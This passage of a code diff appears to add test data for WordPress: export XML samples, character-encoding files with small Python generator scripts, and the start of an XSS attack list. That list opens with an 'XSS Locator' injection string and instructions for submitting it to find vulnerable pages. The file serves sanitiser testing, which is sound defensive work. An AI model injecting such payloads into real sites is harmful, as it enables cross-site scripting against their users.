<wp:meta_key>_edit_lock</wp:meta_key>
<wp:meta_value><![CDATA[1287583809]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_old_slug</wp:meta_key>
<wp:meta_value><![CDATA[]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Child page</title>
<link>http://localhost/?page_id=8</link>
<pubDate>Wed, 20 Oct 2010 14:10:35 +0000</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=8</guid>
<description></description>
<content:encoded><![CDATA[Should have lower ID than parent!]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>8</wp:post_id>
<wp:post_date>2010-10-20 14:10:35</wp:post_date>
<wp:post_date_gmt>2010-10-20 14:10:35</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>closed</wp:ping_status>
<wp:post_name>child-post</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>10</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_edit_lock</wp:meta_key>
<wp:meta_value><![CDATA[1287583856]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
<item>
<title>Parent page</title>
<link>http://localhost/?page_id=10</link>
<pubDate>Wed, 20 Oct 2010 14:10:44 +0000</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=10</guid>
<description></description>
<content:encoded><![CDATA[woop]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>10</wp:post_id>
<wp:post_date>2010-10-20 14:10:44</wp:post_date>
<wp:post_date_gmt>2010-10-20 14:10:44</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>parent-page</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_edit_lock</wp:meta_key>
<wp:meta_value><![CDATA[1287583844]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value><![CDATA[1]]></wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

112
tests/data/export/valid-wxr-1.1.xml Normal file
View File

@ -0,0 +1,112 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- NB: This file is not intended to serve as a complete backup of your blog. -->
<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!-- on the site. For each author, you may choose to map to an -->
<!-- existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages comments, categories, etc. -->
<!-- contained in this file into your blog. -->
<!-- generator="WordPress/3.1-alpha" created="2010-10-17 09:54" -->
<rss version="2.0"
xmlns:excerpt="http://wordpress.org/export/1.1/excerpt/"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:wp="http://wordpress.org/export/1.1/"
>
<channel>
<title>Export Datasets</title>
<link>http://localhost/</link>
<description>Just another WordPress site</description>
<pubDate>Sat, 16 Oct 2010 20:53:18 +0000</pubDate>
<language>en</language>
<wp:wxr_version>1.1</wp:wxr_version>
<wp:base_site_url>http://localhost/</wp:base_site_url>
<wp:base_blog_url>http://localhost/</wp:base_blog_url>
<wp:author><wp:author_id>2</wp:author_id><wp:author_login>john</wp:author_login><wp:author_email>johndoe@example.org</wp:author_email><wp:author_display_name><![CDATA[John Doe]]></wp:author_display_name><wp:author_first_name><![CDATA[John]]></wp:author_first_name><wp:author_last_name><![CDATA[Doe]]></wp:author_last_name></wp:author>
<wp:category><wp:term_id>3</wp:term_id><wp:category_nicename>alpha</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[alpha]]></wp:cat_name><wp:category_description><![CDATA[The alpha category]]></wp:category_description></wp:category>
<wp:tag><wp:term_id>22</wp:term_id><wp:tag_slug>clippable</wp:tag_slug><wp:tag_name><![CDATA[Clippable]]></wp:tag_name><wp:tag_description><![CDATA[The Clippable post_tag]]></wp:tag_description></wp:tag>
<wp:term><wp:term_id>40</wp:term_id><wp:term_taxonomy>post_tax</wp:term_taxonomy><wp:term_slug>bieup</wp:term_slug><wp:term_parent></wp:term_parent><wp:term_name><![CDATA[bieup]]></wp:term_name><wp:term_description><![CDATA[The bieup post_tax]]></wp:term_description></wp:term>
<generator>http://wordpress.org/?v=3.1-alpha</generator>
<item>
<title>Hello world!</title>
<link>http://localhost/?p=1</link>
<pubDate>Sat, 16 Oct 2010 20:53:18 +0000</pubDate>
<dc:creator>john</dc:creator>
<guid isPermaLink="false">http://localhost/?p=1</guid>
<description></description>
<content:encoded><![CDATA[Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>1</wp:post_id>
<wp:post_date>2010-10-16 20:53:18</wp:post_date>
<wp:post_date_gmt>2010-10-16 20:53:18</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>hello-world</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<category domain="category" nicename="alpha"><![CDATA[alpha]]></category>
<category domain="post_tag" nicename="clippable"><![CDATA[Clippable]]></category>
<category domain="post_tax" nicename="bieup"><![CDATA[bieup]]></category>
<wp:comment>
<wp:comment_id>1</wp:comment_id>
<wp:comment_author><![CDATA[Mr WordPress]]></wp:comment_author>
<wp:comment_author_email></wp:comment_author_email>
<wp:comment_author_url>http://wordpress.org/</wp:comment_author_url>
<wp:comment_author_IP></wp:comment_author_IP>
<wp:comment_date>2010-10-16 20:53:18</wp:comment_date>
<wp:comment_date_gmt>2010-10-16 20:53:18</wp:comment_date_gmt>
<wp:comment_content><![CDATA[Hi, this is a comment.<br />To delete a comment, just log in and view the post&#039;s comments. There you will have the option to edit or delete them.]]></wp:comment_content>
<wp:comment_approved>1</wp:comment_approved>
<wp:comment_type></wp:comment_type>
<wp:comment_parent>0</wp:comment_parent>
<wp:comment_user_id>0</wp:comment_user_id>
</wp:comment>
</item>
<item>
<title>About</title>
<link>http://localhost/?page_id=2</link>
<pubDate>Sat, 16 Oct 2010 20:53:18 +0000</pubDate>
<dc:creator>john</dc:creator>
<guid isPermaLink="false">http://localhost/?page_id=2</guid>
<description></description>
<content:encoded><![CDATA[This is an example of a WordPress page. You could edit this to put information about yourself or your site so readers know where you are coming from. You can create as many pages like this one or sub-pages as you like and manage all of your content inside of WordPress.]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>2</wp:post_id>
<wp:post_date>2010-10-16 20:53:18</wp:post_date>
<wp:post_date_gmt>2010-10-16 20:53:18</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>about</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_parent>0</wp:post_parent>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>page</wp:post_type>
<wp:post_password></wp:post_password>
<wp:is_sticky>0</wp:is_sticky>
<wp:postmeta>
<wp:meta_key>_wp_page_template</wp:meta_key>
<wp:meta_value><![CDATA[default]]></wp:meta_value>
</wp:postmeta>
</item>
</channel>
</rss>

51
tests/data/formatting/big5.txt Normal file
View File

@ -0,0 +1,51 @@
?lmDwgn H@~|Q
?lDg
H@
DiDAD`DCWiWAD`WCLAW?alQAWUC
G`LAH[?F`AH[uC?APX?WAP?
?C?S?AC
HG
?U?AcoQ?AoCGL??A
?Au??AU?gAn?MAeHCOHtHBuL
voAuv?CU@j?A??A?A\
?~C??~AOHhC
HT
|A?QQofA?sQiA??
COHutHvvA?A?Az?Aj?C`?LL
C???]CuLvAhLvC
h|
uDvRA????CWAUvQUA?gAM
AP?Q?FsC^?lHH?C
H
?aAHU?QtHAH?m?C?aAS
GH?}A??UXCh?aApuC
H
AO??gC??AO??a?CYsA??C
HC
?a[C?a?HB[?AH???AG[COHtH
?A~??sCDHLpHG?pC
HK
WYCQU?CBH?cAGXDC~aA?
WAPAHAFvA?A?gC??AGL?C
HE
??ApwQ?UAiOC?AuQIQ
zA?SC\EhA?DC

5
tests/data/formatting/cr-line-endings-file-header.php Normal file
View File

@ -0,0 +1,5 @@
<?php
/* Some Header: Some header value!
* Description: This file is using CR line endings for a testcase.
* Author: A Very Old Mac
*/

255
tests/data/formatting/entities.txt Normal file
View File

@ -0,0 +1,255 @@
### Named HTML character entities, their numeric reference
### (e.g. for &#[0-9]+; entity form), and their use.
### From: http://www.w3.org/TR/html401/sgml/entities.html
###
nbsp | 160 ### no-break space
iexcl | 161 ### inverted exclamation mark
cent | 162 ### cent sign
pound | 163 ### pound sterling sign
curren | 164 ### general currency sign
yen | 165 ### yen sign
brvbar | 166 ### broken (vertical) bar
sect | 167 ### section sign
uml | 168 ### umlaut (dieresis)
copy | 169 ### copyright sign
ordf | 170 ### ordinal indicator, feminine
laquo | 171 ### angle quotation mark, left
not | 172 ### not sign
shy | 173 ### soft hyphen
reg | 174 ### registered sign
macr | 175 ### macron
deg | 176 ### degree sign
plusmn | 177 ### plus-or-minus sign
sup2 | 178 ### superscript two
sup3 | 179 ### superscript three
acute | 180 ### acute accent
micro | 181 ### micro sign
para | 182 ### pilcrow (paragraph sign)
middot | 183 ### middle dot
cedil | 184 ### cedilla
sup1 | 185 ### superscript one
ordm | 186 ### ordinal indicator, masculine
raquo | 187 ### angle quotation mark, right
frac14 | 188 ### fraction one-quarter
frac12 | 189 ### fraction one-half
frac34 | 190 ### fraction three-quarters
iquest | 191 ### inverted question mark
Agrave | 192 ### capital A, grave accent
Aacute | 193 ### capital A, acute accent
Acirc | 194 ### capital A, circumflex accent
Atilde | 195 ### capital A, tilde
Auml | 196 ### capital A, dieresis or umlaut mark
Aring | 197 ### capital A, ring
AElig | 198 ### capital AE diphthong (ligature)
Ccedil | 199 ### capital C, cedilla
Egrave | 200 ### capital E, grave accent
Eacute | 201 ### capital E, acute accent
Ecirc | 202 ### capital E, circumflex accent
Euml | 203 ### capital E, dieresis or umlaut mark
Igrave | 204 ### capital I, grave accent
Iacute | 205 ### capital I, acute accent
Icirc | 206 ### capital I, circumflex accent
Iuml | 207 ### capital I, dieresis or umlaut mark
ETH | 208 ### capital Eth, Icelandic
Ntilde | 209 ### capital N, tilde
Ograve | 210 ### capital O, grave accent
Oacute | 211 ### capital O, acute accent
Ocirc | 212 ### capital O, circumflex accent
Otilde | 213 ### capital O, tilde
Ouml | 214 ### capital O, dieresis or umlaut mark
times | 215 ### multiply sign
Oslash | 216 ### capital O, slash
Ugrave | 217 ### capital U, grave accent
Uacute | 218 ### capital U, acute accent
Ucirc | 219 ### capital U, circumflex accent
Uuml | 220 ### capital U, dieresis or umlaut mark
Yacute | 221 ### capital Y, acute accent
THORN | 222 ### capital THORN, Icelandic
szlig | 223 ### small sharp s, German (sz ligature)
agrave | 224 ### small a, grave accent
aacute | 225 ### small a, acute accent
acirc | 226 ### small a, circumflex accent
atilde | 227 ### small a, tilde
auml | 228 ### small a, dieresis or umlaut mark
aring | 229 ### small a, ring
aelig | 230 ### small ae diphthong (ligature)
ccedil | 231 ### small c, cedilla
egrave | 232 ### small e, grave accent
eacute | 233 ### small e, acute accent
ecirc | 234 ### small e, circumflex accent
euml | 235 ### small e, dieresis or umlaut mark
igrave | 236 ### small i, grave accent
iacute | 237 ### small i, acute accent
icirc | 238 ### small i, circumflex accent
iuml | 239 ### small i, dieresis or umlaut mark
eth | 240 ### small eth, Icelandic
ntilde | 241 ### small n, tilde
ograve | 242 ### small o, grave accent
oacute | 243 ### small o, acute accent
ocirc | 244 ### small o, circumflex accent
otilde | 245 ### small o, tilde
ouml | 246 ### small o, dieresis or umlaut mark
divide | 247 ### divide sign
oslash | 248 ### small o, slash
ugrave | 249 ### small u, grave accent
uacute | 250 ### small u, acute accent
ucirc | 251 ### small u, circumflex accent
uuml | 252 ### small u, dieresis or umlaut mark
yacute | 253 ### small y, acute accent
thorn | 254 ### small thorn, Icelandic
yuml | 255 ### small y, dieresis or umlaut mark
fnof | 402 ### latin small f with hook, =function, =florin, u+0192 ISOtech
Alpha | 913 ### greek capital letter alpha, u+0391
Beta | 914 ### greek capital letter beta, u+0392
Gamma | 915 ### greek capital letter gamma, u+0393 ISOgrk3
Delta | 916 ### greek capital letter delta, u+0394 ISOgrk3
Epsilon | 917 ### greek capital letter epsilon, u+0395
Zeta | 918 ### greek capital letter zeta, u+0396
Eta | 919 ### greek capital letter eta, u+0397
Theta | 920 ### greek capital letter theta, u+0398 ISOgrk3
Iota | 921 ### greek capital letter iota, u+0399
Kappa | 922 ### greek capital letter kappa, u+039A
Lambda | 923 ### greek capital letter lambda, u+039B ISOgrk3
Mu | 924 ### greek capital letter mu, u+039C
Nu | 925 ### greek capital letter nu, u+039D
Xi | 926 ### greek capital letter xi, u+039E ISOgrk3
Omicron | 927 ### greek capital letter omicron, u+039F
Pi | 928 ### greek capital letter pi, u+03A0 ISOgrk3
Rho | 929 ### greek capital letter rho, u+03A1
Sigma | 931 ### greek capital letter sigma, u+03A3 ISOgrk3
Tau | 932 ### greek capital letter tau, u+03A4
Upsilon | 933 ### greek capital letter upsilon, u+03A5 ISOgrk3
Phi | 934 ### greek capital letter phi, u+03A6 ISOgrk3
Chi | 935 ### greek capital letter chi, u+03A7
Psi | 936 ### greek capital letter psi, u+03A8 ISOgrk3
Omega | 937 ### greek capital letter omega, u+03A9 ISOgrk3
alpha | 945 ### greek small letter alpha, u+03B1 ISOgrk3
beta | 946 ### greek small letter beta, u+03B2 ISOgrk3
gamma | 947 ### greek small letter gamma, u+03B3 ISOgrk3
delta | 948 ### greek small letter delta, u+03B4 ISOgrk3
epsilon | 949 ### greek small letter epsilon, u+03B5 ISOgrk3
zeta | 950 ### greek small letter zeta, u+03B6 ISOgrk3
eta | 951 ### greek small letter eta, u+03B7 ISOgrk3
theta | 952 ### greek small letter theta, u+03B8 ISOgrk3
iota | 953 ### greek small letter iota, u+03B9 ISOgrk3
kappa | 954 ### greek small letter kappa, u+03BA ISOgrk3
lambda | 955 ### greek small letter lambda, u+03BB ISOgrk3
mu | 956 ### greek small letter mu, u+03BC ISOgrk3
nu | 957 ### greek small letter nu, u+03BD ISOgrk3
xi | 958 ### greek small letter xi, u+03BE ISOgrk3
omicron | 959 ### greek small letter omicron, u+03BF NEW
pi | 960 ### greek small letter pi, u+03C0 ISOgrk3
rho | 961 ### greek small letter rho, u+03C1 ISOgrk3
sigmaf | 962 ### greek small letter final sigma, u+03C2 ISOgrk3
sigma | 963 ### greek small letter sigma, u+03C3 ISOgrk3
tau | 964 ### greek small letter tau, u+03C4 ISOgrk3
upsilon | 965 ### greek small letter upsilon, u+03C5 ISOgrk3
phi | 966 ### greek small letter phi, u+03C6 ISOgrk3
chi | 967 ### greek small letter chi, u+03C7 ISOgrk3
psi | 968 ### greek small letter psi, u+03C8 ISOgrk3
omega | 969 ### greek small letter omega, u+03C9 ISOgrk3
thetasym| 977 ### greek small letter theta symbol, u+03D1 NEW
upsih | 978 ### greek upsilon with hook symbol, u+03D2 NEW
piv | 982 ### greek pi symbol, u+03D6 ISOgrk3
bull | 8226 ### bullet, =black small circle, u+2022 ISOpub
hellip | 8230 ### horizontal ellipsis, =three dot leader, u+2026 ISOpub
prime | 8242 ### prime, =minutes, =feet, u+2032 ISOtech
Prime | 8243 ### double prime, =seconds, =inches, u+2033 ISOtech
oline | 8254 ### overline, =spacing overscore, u+203E NEW
frasl | 8260 ### fraction slash, u+2044 NEW
weierp | 8472 ### script capital P, =power set, =Weierstrass p, u+2118 ISOamso
image | 8465 ### blackletter capital I, =imaginary part, u+2111 ISOamso
real | 8476 ### blackletter capital R, =real part symbol, u+211C ISOamso
trade | 8482 ### trade mark sign, u+2122 ISOnum
alefsym | 8501 ### alef symbol, =first transfinite cardinal, u+2135 NEW
larr | 8592 ### leftwards arrow, u+2190 ISOnum
uarr | 8593 ### upwards arrow, u+2191 ISOnum
rarr | 8594 ### rightwards arrow, u+2192 ISOnum
darr | 8595 ### downwards arrow, u+2193 ISOnum
harr | 8596 ### left right arrow, u+2194 ISOamsa
crarr | 8629 ### downwards arrow with corner leftwards, =carriage return, u+21B5 NEW
lArr | 8656 ### leftwards double arrow, u+21D0 ISOtech
uArr | 8657 ### upwards double arrow, u+21D1 ISOamsa
rArr | 8658 ### rightwards double arrow, u+21D2 ISOtech
dArr | 8659 ### downwards double arrow, u+21D3 ISOamsa
hArr | 8660 ### left right double arrow, u+21D4 ISOamsa
forall | 8704 ### for all, u+2200 ISOtech
part | 8706 ### partial differential, u+2202 ISOtech
exist | 8707 ### there exists, u+2203 ISOtech
empty | 8709 ### empty set, =null set, =diameter, u+2205 ISOamso
nabla | 8711 ### nabla, =backward difference, u+2207 ISOtech
isin | 8712 ### element of, u+2208 ISOtech
notin | 8713 ### not an element of, u+2209 ISOtech
ni | 8715 ### contains as member, u+220B ISOtech
prod | 8719 ### n-ary product, =product sign, u+220F ISOamsb
sum | 8721 ### n-ary sumation, u+2211 ISOamsb
minus | 8722 ### minus sign, u+2212 ISOtech
lowast | 8727 ### asterisk operator, u+2217 ISOtech
radic | 8730 ### square root, =radical sign, u+221A ISOtech
prop | 8733 ### proportional to, u+221D ISOtech
infin | 8734 ### infinity, u+221E ISOtech
ang | 8736 ### angle, u+2220 ISOamso
and | 8743 ### logical and, =wedge, u+2227 ISOtech
or | 8744 ### logical or, =vee, u+2228 ISOtech
cap | 8745 ### intersection, =cap, u+2229 ISOtech
cup | 8746 ### union, =cup, u+222A ISOtech
int | 8747 ### integral, u+222B ISOtech
there4 | 8756 ### therefore, u+2234 ISOtech
sim | 8764 ### tilde operator, =varies with, =similar to, u+223C ISOtech
cong | 8773 ### approximately equal to, u+2245 ISOtech
asymp | 8776 ### almost equal to, =asymptotic to, u+2248 ISOamsr
ne | 8800 ### not equal to, u+2260 ISOtech
equiv | 8801 ### identical to, u+2261 ISOtech
le | 8804 ### less-than or equal to, u+2264 ISOtech
ge | 8805 ### greater-than or equal to, u+2265 ISOtech
sub | 8834 ### subset of, u+2282 ISOtech
sup | 8835 ### superset of, u+2283 ISOtech
nsub | 8836 ### not a subset of, u+2284 ISOamsn
sube | 8838 ### subset of or equal to, u+2286 ISOtech
supe | 8839 ### superset of or equal to, u+2287 ISOtech
oplus | 8853 ### circled plus, =direct sum, u+2295 ISOamsb
otimes | 8855 ### circled times, =vector product, u+2297 ISOamsb
perp | 8869 ### up tack, =orthogonal to, =perpendicular, u+22A5 ISOtech
sdot | 8901 ### dot operator, u+22C5 ISOamsb
lceil | 8968 ### left ceiling, =apl upstile, u+2308, ISOamsc
rceil | 8969 ### right ceiling, u+2309, ISOamsc
lfloor | 8970 ### left floor, =apl downstile, u+230A, ISOamsc
rfloor | 8971 ### right floor, u+230B, ISOamsc
lang | 9001 ### left-pointing angle bracket, =bra, u+2329 ISOtech
rang | 9002 ### right-pointing angle bracket, =ket, u+232A ISOtech
loz | 9674 ### lozenge, u+25CA ISOpub
spades | 9824 ### black spade suit, u+2660 ISOpub
clubs | 9827 ### black club suit, =shamrock, u+2663 ISOpub
hearts | 9829 ### black heart suit, =valentine, u+2665 ISOpub
diams | 9830 ### black diamond suit, u+2666 ISOpub
quot | 34 ### quotation mark, =apl quote, u+0022 ISOnum
amp | 38 ### ampersand, u+0026 ISOnum
lt | 60 ### less-than sign, u+003C ISOnum
gt | 62 ### greater-than sign, u+003E ISOnum
OElig | 338 ### latin capital ligature oe, u+0152 ISOlat2
oelig | 339 ### latin small ligature oe, u+0153 ISOlat2
Scaron | 352 ### latin capital letter s with caron, u+0160 ISOlat2
scaron | 353 ### latin small letter s with caron, u+0161 ISOlat2
Yuml | 376 ### latin capital letter y with diaeresis, u+0178 ISOlat2
circ | 710 ### modifier letter circumflex accent, u+02C6 ISOpub
tilde | 732 ### small tilde, u+02DC ISOdia
ensp | 8194 ### en space, u+2002 ISOpub
emsp | 8195 ### em space, u+2003 ISOpub
thinsp | 8201 ### thin space, u+2009 ISOpub
zwnj | 8204 ### zero width non-joiner, u+200C NEW RFC 2070
zwj | 8205 ### zero width joiner, u+200D NEW RFC 2070
lrm | 8206 ### left-to-right mark, u+200E NEW RFC 2070
rlm | 8207 ### right-to-left mark, u+200F NEW RFC 2070
ndash | 8211 ### en dash, u+2013 ISOpub
mdash | 8212 ### em dash, u+2014 ISOpub
lsquo | 8216 ### left single quotation mark, u+2018 ISOnum
rsquo | 8217 ### right single quotation mark, u+2019 ISOnum
sbquo | 8218 ### single low-9 quotation mark, u+201A NEW
ldquo | 8220 ### left double quotation mark, u+201C ISOnum
rdquo | 8221 ### right double quotation mark, u+201D ISOnum
bdquo | 8222 ### double low-9 quotation mark, u+201E NEW
dagger | 8224 ### dagger, u+2020 ISOpub
Dagger | 8225 ### double dagger, u+2021 ISOpub
permil | 8240 ### per mille sign, u+2030 ISOtech
lsaquo | 8249 ### single left-pointing angle quotation mark; proposed but not yet standardised
rsaquo | 8250 ### single right-pointing angle quotation mark; proposed but not yet standardised

1
tests/data/formatting/remove_accents.01.input.txt Normal file
View File

@ -0,0 +1 @@
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>▲祇疎団吐班碧麺力冫嘖孛慵无槿珀矣粤艾蜉謖邇闡鴦<EFBFBD><EFBFBD>巐鄕<EFBFBD><EFBFBD><EFBFBD><EFBFBD>鳶渤胛<EFBFBD>

1445
tests/data/formatting/sizzle.js Normal file
View File

File diff suppressed because it is too large Load Diff

15
tests/data/formatting/utf-8/README Normal file
View File

@ -0,0 +1,15 @@
The Python scripts are for generating test data, because Python's Unicode
support is much, much, much, much better than PHP's.
* `utf-8/urlencode.py`, `utf-8/u-urlencode.py` and `utf-8/entitize.py` process UTF-8
into a few different formats (%-encoding, %u-encoding, &#decimal;)
and are used like normal UNIXy pipes.
Try:
`python urlencode.py < utf-8.txt > urlencoded.txt`
`python u-urlencode.py < utf-8.txt > u-urlencoded.txt`
`python entitize.py < utf-8.txt > entitized.txt`
* `windows-1252.py` converts Windows-only smart-quotes and things
into their unicode &#decimal reference; equivalents.

24
tests/data/formatting/utf-8/entitize.py Normal file
View File

@ -0,0 +1,24 @@
# Generates entitized.txt from utf-8.txt
#
# entitized.txt is used by Tests_Formatting_UrlEncodedToEntities
import codecs
import sys
def entitize(line):
"""Convert text to &#[dec]; entities."""
line = line.strip();
line = ["&#%d;" % ord(s) for s in line]
return "".join(line)
if __name__ == "__main__":
args = sys.argv[1:]
if args and args[0] in ("-h", "--help"):
print "Usage: python entitize.py < utf-8.txt > entitized.txt"
sys.exit(2)
sys.stdin = codecs.getreader("utf-8")(sys.stdin)
sys.stdout = codecs.getwriter("ascii")(sys.stdout)
lines = sys.stdin.readlines()
sys.stdout.write( "\n".join(map(entitize, lines)) )

5
tests/data/formatting/utf-8/entitized.txt Normal file
View File

@ -0,0 +1,5 @@
&#31456;&#23376;&#24609;
&#70;&#114;&#97;&#110;&#231;&#111;&#105;&#115;&#32;&#84;&#114;&#117;&#102;&#102;&#97;&#117;&#116;
&#4321;&#4304;&#4325;&#4304;&#4320;&#4311;&#4309;&#4308;&#4314;&#4317;
&#66;&#106;&#246;&#114;&#107;&#32;&#71;&#117;&#240;&#109;&#117;&#110;&#100;&#115;&#100;&#243;&#116;&#116;&#105;&#114;
&#23470;&#23822;&#12288;&#39423;

24
tests/data/formatting/utf-8/u-urlencode.py Normal file
View File

@ -0,0 +1,24 @@
# Generates u-urlencoded.txt from utf-8.txt
#
# u-urlencoded.txt is used by Tests_Formatting_UrlEncodedToEntities
import codecs
import sys
def uurlencode(line):
"""Use %u[hexvalue] percent encoding."""
line = line.strip()
line = ["%%u%04X" % ord(s) for s in line]
return "".join(line)
if __name__ == "__main__":
args = sys.argv[1:]
if args and args[0] in ("-h", "--help"):
print "Usage: python u-urlencode.py < utf-8.txt > u-urlencoded.txt"
sys.exit(2)
sys.stdin = codecs.getreader("utf-8")(sys.stdin)
sys.stdout = codecs.getwriter("ascii")(sys.stdout)
lines = sys.stdin.readlines()
sys.stdout.write( "\n".join(map(uurlencode, lines)) )

5
tests/data/formatting/utf-8/u-urlencoded.txt Normal file
View File

@ -0,0 +1,5 @@
%u7AE0%u5B50%u6021
%u0046%u0072%u0061%u006E%u00E7%u006F%u0069%u0073%u0020%u0054%u0072%u0075%u0066%u0066%u0061%u0075%u0074
%u10E1%u10D0%u10E5%u10D0%u10E0%u10D7%u10D5%u10D4%u10DA%u10DD
%u0042%u006A%u00F6%u0072%u006B%u0020%u0047%u0075%u00F0%u006D%u0075%u006E%u0064%u0073%u0064%u00F3%u0074%u0074%u0069%u0072
%u5BAE%u5D0E%u3000%u99FF

33
tests/data/formatting/utf-8/urlencode.py Normal file
View File

@ -0,0 +1,33 @@
# Generates urlencoded.txt from utf-8.txt
#
# urlencoded.txt is used by Tests_Formatting_Utf8UriEncode
import urllib, codecs, re
import sys
# uncapitalize pct-encoded values, leave the rest alone
capfix = re.compile("%([0-9A-Z]{2})");
def fix(match):
octet = match.group(1)
intval = int(octet, 16)
if intval < 128:
return chr(intval).lower()
return '%' + octet.lower()
def urlencode(line):
"""Percent-encode each byte of non-ASCII unicode characters."""
line = urllib.quote(line.strip().encode("utf-8"))
line = capfix.sub(fix, line)
return line
if __name__ == "__main__":
args = sys.argv[1:]
if args and args[0] in ("-h", "--help"):
print "Usage: python urlencode.py < utf-8.txt > urlencoded.txt"
sys.exit(2)
sys.stdin = codecs.getreader("utf-8")(sys.stdin)
sys.stdout = codecs.getwriter("ascii")(sys.stdout)
lines = sys.stdin.readlines()
sys.stdout.write( "\n".join(map(urlencode, lines)) )

5
tests/data/formatting/utf-8/urlencoded.txt Normal file
View File

@ -0,0 +1,5 @@
%e7%ab%a0%e5%ad%90%e6%80%a1
Fran%c3%a7ois Truffaut
%e1%83%a1%e1%83%90%e1%83%a5%e1%83%90%e1%83%a0%e1%83%97%e1%83%95%e1%83%94%e1%83%9a%e1%83%9d
Bj%c3%b6rk Gu%c3%b0mundsd%c3%b3ttir
%e5%ae%ae%e5%b4%8e%e3%80%80%e9%a7%bf

5
tests/data/formatting/utf-8/utf-8.txt Normal file
View File

@ -0,0 +1,5 @@
章子怡
François Truffaut
საქართველო
Björk Guðmundsdóttir
宮崎 駿

27
tests/data/formatting/windows1252.py Normal file
View File

@ -0,0 +1,27 @@
# Generates test data for functions converting between
# dodgy windows-1252-only values and their unicode counterparts
unichars = ["201A", "0192", "201E", "2026", "2020", "2021",
"02C6", "2030", "0160", "2039", "0152", "2018",
"2019", "201C", "201D", "2022", "2013", "2014",
"02DC", "2122", "0161", "203A", "0153", "0178"];
winpoints = []
unipoints = []
for char in unichars:
char = unichr(int(char, 16))
dec = ord(char)
win = ord(char.encode("windows-1252"))
unipoints.append(dec)
winpoints.append(win)
def entitize(s):
return "&#%s;" % s
winpoints = map(entitize, winpoints)
unipoints = map(entitize, unipoints)
print "".join(winpoints), "".join(unipoints)

976
tests/data/formatting/xssAttacks.xml Normal file
View File

@ -0,0 +1,976 @@
<?xml version="1.0"?>
<xss>
<attack>
<name>XSS Locator</name>
<code>&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}</code>
<desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word &quot;XSS&quot; will pop up. You&apos;ll need to replace the &quot;&amp;&quot; with &quot;%26&quot; if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you&apos;re in a rush and need to quickly check a page, often times injecting the deprecated &quot;&lt;PLAINTEXT&gt;&quot; tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
<label>Basic XSS Attacks</label>
